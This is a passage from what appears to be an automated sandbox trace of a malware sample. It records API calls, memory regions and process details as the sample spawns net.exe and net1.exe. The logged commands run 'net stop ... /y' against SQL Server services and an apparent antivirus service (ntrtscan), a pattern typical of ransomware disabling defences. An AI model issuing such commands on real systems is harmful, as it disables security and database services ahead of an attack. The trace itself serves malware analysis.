_String="MSSQLSERVEROLAPSERVICE") returned="MSSQLSERVEROLAPSERVICE" [0107.108] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x1ace40 [0107.118] GetServiceKeyNameW (in: hSCManager=0x1ace40, lpDisplayName="MSSQLSERVEROLAPSERVICE", lpServiceName=0xffa35750, lpcchBuffer=0xaf868 | out: lpServiceName="", lpcchBuffer=0xaf868) returned 0 [0107.119] _wcsicmp (_String1="msg", _String2="MSSQLSERVEROLAPSERVICE") returned -12 [0107.119] _wcsicmp (_String1="messenger", _String2="MSSQLSERVEROLAPSERVICE") returned -14 [0107.119] _wcsicmp (_String1="receiver", _String2="MSSQLSERVEROLAPSERVICE") returned 5 [0107.119] _wcsicmp (_String1="rcv", _String2="MSSQLSERVEROLAPSERVICE") returned 5 [0107.119] _wcsicmp (_String1="redirector", _String2="MSSQLSERVEROLAPSERVICE") returned 5 [0107.119] _wcsicmp (_String1="redir", _String2="MSSQLSERVEROLAPSERVICE") returned 5 [0107.119] _wcsicmp (_String1="rdr", _String2="MSSQLSERVEROLAPSERVICE") returned 5 [0107.119] _wcsicmp (_String1="workstation", _String2="MSSQLSERVEROLAPSERVICE") returned 10 [0107.119] _wcsicmp (_String1="work", _String2="MSSQLSERVEROLAPSERVICE") returned 10 [0107.119] _wcsicmp (_String1="wksta", _String2="MSSQLSERVEROLAPSERVICE") returned 10 [0107.119] _wcsicmp (_String1="prdr", _String2="MSSQLSERVEROLAPSERVICE") returned 3 [0107.119] _wcsicmp (_String1="devrdr", _String2="MSSQLSERVEROLAPSERVICE") returned -9 [0107.119] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLSERVEROLAPSERVICE") returned -1 [0107.120] _wcsicmp (_String1="server", _String2="MSSQLSERVEROLAPSERVICE") returned 6 [0107.120] _wcsicmp (_String1="svr", _String2="MSSQLSERVEROLAPSERVICE") returned 6 [0107.120] _wcsicmp (_String1="srv", _String2="MSSQLSERVEROLAPSERVICE") returned 6 [0107.120] _wcsicmp (_String1="lanmanserver", _String2="MSSQLSERVEROLAPSERVICE") returned -1 [0107.120] _wcsicmp (_String1="alerter", _String2="MSSQLSERVEROLAPSERVICE") returned -12 [0107.120] _wcsicmp (_String1="netlogon", _String2="MSSQLSERVEROLAPSERVICE") returned 1 [0107.120] NetServiceControl (in: servername=0x0, service="MSSQLSERVEROLAPSERVICE", opcode=0x0, arg=0x0, bufptr=0xaf870 | out: bufptr=0xaf870) returned 0x889 [0107.122] wcscpy_s (in: _Destination=0xffa380d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0107.122] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0107.122] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffa35b50, nSize=0x800, Arguments=0xffa37f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0107.123] GetFileType (hFile=0xb) returned 0x2 [0107.126] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xaf738 | out: lpMode=0xaf738) returned 1 [0107.126] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffa35b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xaf730, lpReserved=0x0 | out: lpBuffer=0xffa35b50*, lpNumberOfCharsWritten=0xaf730*=0x1e) returned 1 [0107.126] GetFileType (hFile=0xb) returned 0x2 [0107.127] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xaf738 | out: lpMode=0xaf738) returned 1 [0107.127] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffa11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xaf730, lpReserved=0x0 | out: lpBuffer=0xffa11efc*, lpNumberOfCharsWritten=0xaf730*=0x2) returned 1 [0107.127] _ultow (in: _Dest=0x889, _Radix=718752 | out: _Dest=0x889) returned="2185" [0107.127] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffa35b50, nSize=0x800, Arguments=0xffa37f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0107.128] GetFileType (hFile=0xb) returned 0x2 [0107.128] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xaf738 | out: lpMode=0xaf738) returned 1 [0107.129] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffa35b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xaf730, lpReserved=0x0 | out: lpBuffer=0xffa35b50*, lpNumberOfCharsWritten=0xaf730*=0x34) returned 1 [0107.129] GetFileType (hFile=0xb) returned 0x2 [0107.129] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xaf738 | out: lpMode=0xaf738) returned 1 [0107.129] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffa11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xaf730, lpReserved=0x0 | out: lpBuffer=0xffa11efc*, lpNumberOfCharsWritten=0xaf730*=0x2) returned 1 [0107.130] NetApiBufferFree (Buffer=0x1a4d60) returned 0x0 [0107.130] NetApiBufferFree (Buffer=0x1ac130) returned 0x0 [0107.130] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLServerOLAPService /y" [0107.130] exit (_Code=2) Process: id = "225" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x5de6e000" os_pid = "0xcac" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "216" os_parent_pid = "0x228" cmd_line = "C:\\Windows\\system32\\net1 stop MSSQLServerADHelper100 /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8734 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8735 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8736 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8737 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 8738 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8739 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8740 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8741 start_va = 0xffa10000 end_va = 0xffa42fff entry_point = 0xffa10000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 8742 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8743 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 8744 start_va = 0x7fffffd3000 end_va = 0x7fffffd3fff entry_point = 0x0 region_type = private name = "private_0x000007fffffd3000" filename = "" Region: id = 8745 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 8746 start_va = 0x110000 end_va = 0x20ffff entry_point = 0x0 region_type = private name = "private_0x0000000000110000" filename = "" Region: id = 8747 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8748 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8787 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 8788 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8789 start_va = 0x210000 end_va = 0x276fff entry_point = 0x210000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8790 start_va = 0x280000 end_va = 0x37ffff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 8791 start_va = 0x460000 end_va = 0x46ffff entry_point = 0x0 region_type = private name = "private_0x0000000000460000" filename = "" Region: id = 8792 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 8793 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 8794 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 8795 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 8796 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 8797 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 8798 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 8799 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 8800 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 8801 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 8802 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 8803 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 8804 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8805 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 8806 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 8807 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 8808 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 8809 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 8811 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 687 os_tid = 0xcc8 [0107.099] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xefcf0 | out: lpSystemTimeAsFileTime=0xefcf0*(dwLowDateTime=0xf4fd0090, dwHighDateTime=0x1d48689)) [0107.099] GetCurrentProcessId () returned 0xcac [0107.099] GetCurrentThreadId () returned 0xcc8 [0107.099] GetTickCount () returned 0x24826 [0107.099] QueryPerformanceCounter (in: lpPerformanceCount=0xefcf8 | out: lpPerformanceCount=0xefcf8*=1815401700000) returned 1 [0107.100] GetModuleHandleW (lpModuleName=0x0) returned 0xffa10000 [0107.100] __set_app_type (_Type=0x1) [0107.100] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xffa29c9c) returned 0x0 [0107.100] __getmainargs (in: _Argc=0xffa34780, _Argv=0xffa34790, _Env=0xffa34788, _DoWildCard=0, _StartInfo=0xffa3479c | out: _Argc=0xffa34780, _Argv=0xffa34790, _Env=0xffa34788) returned 0 [0107.100] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0107.101] GetConsoleOutputCP () returned 0x1b5 [0107.102] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xffa3cec0 | out: lpCPInfo=0xffa3cec0) returned 1 [0107.102] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0107.105] sprintf_s (in: _DstBuf=0xefc98, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0107.105] setlocale (category=0, locale=".437") returned="English_United States.437" [0107.112] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0107.112] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0107.112] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLServerADHelper100 /y" [0107.112] GetModuleFileNameW (in: hModule=0x0, lpFilename=0xefa30, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0107.112] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0107.112] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xefc88 | out: Buffer=0xefc88*=0x124d60) returned 0x0 [0107.112] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0xefc88 | out: Buffer=0xefc88*=0x12c130) returned 0x0 [0107.112] _fileno (_File=0x7fefdba2a80) returned 0 [0107.112] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0107.112] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0107.112] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0107.112] _wcsicmp (_String1="config", _String2="stop") returned -16 [0107.112] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0107.112] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0107.112] _wcsicmp (_String1="file", _String2="stop") returned -13 [0107.112] _wcsicmp (_String1="files", _String2="stop") returned -13 [0107.112] _wcsicmp (_String1="group", _String2="stop") returned -12 [0107.112] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0107.112] _wcsicmp (_String1="help", _String2="stop") returned -11 [0107.112] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0107.112] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0107.112] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0107.113] _wcsicmp (_String1="session", _String2="stop") returned -15 [0107.113] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0107.113] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0107.113] _wcsicmp (_String1="share", _String2="stop") returned -12 [0107.113] _wcsicmp (_String1="start", _String2="stop") returned -14 [0107.113] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0107.113] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0107.113] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0107.113] _wcsicmp (_String1="accounts", _String2="MSSQLServerADHelper100") returned -12 [0107.113] _wcsicmp (_String1="computer", _String2="MSSQLServerADHelper100") returned -10 [0107.113] _wcsicmp (_String1="config", _String2="MSSQLServerADHelper100") returned -10 [0107.113] _wcsicmp (_String1="continue", _String2="MSSQLServerADHelper100") returned -10 [0107.113] _wcsicmp (_String1="cont", _String2="MSSQLServerADHelper100") returned -10 [0107.113] _wcsicmp (_String1="file", _String2="MSSQLServerADHelper100") returned -7 [0107.113] _wcsicmp (_String1="files", _String2="MSSQLServerADHelper100") returned -7 [0107.113] _wcsicmp (_String1="group", _String2="MSSQLServerADHelper100") returned -6 [0107.113] _wcsicmp (_String1="groups", _String2="MSSQLServerADHelper100") returned -6 [0107.113] _wcsicmp (_String1="help", _String2="MSSQLServerADHelper100") returned -5 [0107.113] _wcsicmp (_String1="helpmsg", _String2="MSSQLServerADHelper100") returned -5 [0107.113] _wcsicmp (_String1="localgroup", _String2="MSSQLServerADHelper100") returned -1 [0107.113] _wcsicmp (_String1="pause", _String2="MSSQLServerADHelper100") returned 3 [0107.113] _wcsicmp (_String1="session", _String2="MSSQLServerADHelper100") returned 6 [0107.113] _wcsicmp (_String1="sessions", _String2="MSSQLServerADHelper100") returned 6 [0107.113] _wcsicmp (_String1="sess", _String2="MSSQLServerADHelper100") returned 6 [0107.113] _wcsicmp (_String1="share", _String2="MSSQLServerADHelper100") returned 6 [0107.113] _wcsicmp (_String1="start", _String2="MSSQLServerADHelper100") returned 6 [0107.113] _wcsicmp (_String1="stats", _String2="MSSQLServerADHelper100") returned 6 [0107.113] _wcsicmp (_String1="statistics", _String2="MSSQLServerADHelper100") returned 6 [0107.113] _wcsicmp (_String1="stop", _String2="MSSQLServerADHelper100") returned 6 [0107.113] _wcsicmp (_String1="time", _String2="MSSQLServerADHelper100") returned 7 [0107.113] _wcsicmp (_String1="user", _String2="MSSQLServerADHelper100") returned 8 [0107.113] _wcsicmp (_String1="users", _String2="MSSQLServerADHelper100") returned 8 [0107.113] _wcsicmp (_String1="msg", _String2="MSSQLServerADHelper100") returned -12 [0107.113] _wcsicmp (_String1="messenger", _String2="MSSQLServerADHelper100") returned -14 [0107.113] _wcsicmp (_String1="receiver", _String2="MSSQLServerADHelper100") returned 5 [0107.114] _wcsicmp (_String1="rcv", _String2="MSSQLServerADHelper100") returned 5 [0107.114] _wcsicmp (_String1="netpopup", _String2="MSSQLServerADHelper100") returned 1 [0107.114] _wcsicmp (_String1="redirector", _String2="MSSQLServerADHelper100") returned 5 [0107.114] _wcsicmp (_String1="redir", _String2="MSSQLServerADHelper100") returned 5 [0107.114] _wcsicmp (_String1="rdr", _String2="MSSQLServerADHelper100") returned 5 [0107.114] _wcsicmp (_String1="workstation", _String2="MSSQLServerADHelper100") returned 10 [0107.114] _wcsicmp (_String1="work", _String2="MSSQLServerADHelper100") returned 10 [0107.114] _wcsicmp (_String1="wksta", _String2="MSSQLServerADHelper100") returned 10 [0107.114] _wcsicmp (_String1="prdr", _String2="MSSQLServerADHelper100") returned 3 [0107.114] _wcsicmp (_String1="devrdr", _String2="MSSQLServerADHelper100") returned -9 [0107.114] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLServerADHelper100") returned -1 [0107.114] _wcsicmp (_String1="server", _String2="MSSQLServerADHelper100") returned 6 [0107.114] _wcsicmp (_String1="svr", _String2="MSSQLServerADHelper100") returned 6 [0107.114] _wcsicmp (_String1="srv", _String2="MSSQLServerADHelper100") returned 6 [0107.114] _wcsicmp (_String1="lanmanserver", _String2="MSSQLServerADHelper100") returned -1 [0107.114] _wcsicmp (_String1="alerter", _String2="MSSQLServerADHelper100") returned -12 [0107.114] _wcsicmp (_String1="netlogon", _String2="MSSQLServerADHelper100") returned 1 [0107.114] _wcsupr (in: _String="MSSQLServerADHelper100" | out: _String="MSSQLSERVERADHELPER100") returned="MSSQLSERVERADHELPER100" [0107.114] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x12ce40 [0107.118] GetServiceKeyNameW (in: hSCManager=0x12ce40, lpDisplayName="MSSQLSERVERADHELPER100", lpServiceName=0xffa35750, lpcchBuffer=0xefba8 | out: lpServiceName="", lpcchBuffer=0xefba8) returned 0 [0107.120] _wcsicmp (_String1="msg", _String2="MSSQLSERVERADHELPER100") returned -12 [0107.120] _wcsicmp (_String1="messenger", _String2="MSSQLSERVERADHELPER100") returned -14 [0107.120] _wcsicmp (_String1="receiver", _String2="MSSQLSERVERADHELPER100") returned 5 [0107.120] _wcsicmp (_String1="rcv", _String2="MSSQLSERVERADHELPER100") returned 5 [0107.120] _wcsicmp (_String1="redirector", _String2="MSSQLSERVERADHELPER100") returned 5 [0107.121] _wcsicmp (_String1="redir", _String2="MSSQLSERVERADHELPER100") returned 5 [0107.121] _wcsicmp (_String1="rdr", _String2="MSSQLSERVERADHELPER100") returned 5 [0107.121] _wcsicmp (_String1="workstation", _String2="MSSQLSERVERADHELPER100") returned 10 [0107.121] _wcsicmp (_String1="work", _String2="MSSQLSERVERADHELPER100") returned 10 [0107.121] _wcsicmp (_String1="wksta", _String2="MSSQLSERVERADHELPER100") returned 10 [0107.121] _wcsicmp (_String1="prdr", _String2="MSSQLSERVERADHELPER100") returned 3 [0107.121] _wcsicmp (_String1="devrdr", _String2="MSSQLSERVERADHELPER100") returned -9 [0107.121] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQLSERVERADHELPER100") returned -1 [0107.121] _wcsicmp (_String1="server", _String2="MSSQLSERVERADHELPER100") returned 6 [0107.121] _wcsicmp (_String1="svr", _String2="MSSQLSERVERADHELPER100") returned 6 [0107.121] _wcsicmp (_String1="srv", _String2="MSSQLSERVERADHELPER100") returned 6 [0107.121] _wcsicmp (_String1="lanmanserver", _String2="MSSQLSERVERADHELPER100") returned -1 [0107.121] _wcsicmp (_String1="alerter", _String2="MSSQLSERVERADHELPER100") returned -12 [0107.121] _wcsicmp (_String1="netlogon", _String2="MSSQLSERVERADHELPER100") returned 1 [0107.121] NetServiceControl (in: servername=0x0, service="MSSQLSERVERADHELPER100", opcode=0x0, arg=0x0, bufptr=0xefbb0 | out: bufptr=0xefbb0) returned 0x889 [0107.124] wcscpy_s (in: _Destination=0xffa380d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0107.124] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0107.124] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xffa35b50, nSize=0x800, Arguments=0xffa37f90 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0107.125] GetFileType (hFile=0xb) returned 0x2 [0107.126] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefa78 | out: lpMode=0xefa78) returned 1 [0107.126] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffa35b50*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0xefa70, lpReserved=0x0 | out: lpBuffer=0xffa35b50*, lpNumberOfCharsWritten=0xefa70*=0x1e) returned 1 [0107.126] GetFileType (hFile=0xb) returned 0x2 [0107.127] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefa78 | out: lpMode=0xefa78) returned 1 [0107.127] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffa11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xefa70, lpReserved=0x0 | out: lpBuffer=0xffa11efc*, lpNumberOfCharsWritten=0xefa70*=0x2) returned 1 [0107.128] _ultow (in: _Dest=0x889, _Radix=981728 | out: _Dest=0x889) returned="2185" [0107.128] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xffa35b50, nSize=0x800, Arguments=0xffa37f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0107.128] GetFileType (hFile=0xb) returned 0x2 [0107.128] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefa78 | out: lpMode=0xefa78) returned 1 [0107.129] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffa35b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0xefa70, lpReserved=0x0 | out: lpBuffer=0xffa35b50*, lpNumberOfCharsWritten=0xefa70*=0x34) returned 1 [0107.158] GetFileType (hFile=0xb) returned 0x2 [0107.158] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0xefa78 | out: lpMode=0xefa78) returned 1 [0107.158] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xffa11efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xefa70, lpReserved=0x0 | out: lpBuffer=0xffa11efc*, lpNumberOfCharsWritten=0xefa70*=0x2) returned 1 [0107.159] NetApiBufferFree (Buffer=0x124d60) returned 0x0 [0107.159] NetApiBufferFree (Buffer=0x12c130) returned 0x0 [0107.159] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQLServerADHelper100 /y" [0107.159] exit (_Code=2) Process: id = "226" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5ddc3000" os_pid = "0xd04" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop ntrtscan /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 8749 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 8750 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 8751 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 8752 start_va = 0x70000 end_va = 0xeffff entry_point = 0x0 region_type = private name = "private_0x0000000000070000" filename = "" Region: id = 8753 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 8754 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 8755 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 8756 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 8757 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 8758 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff 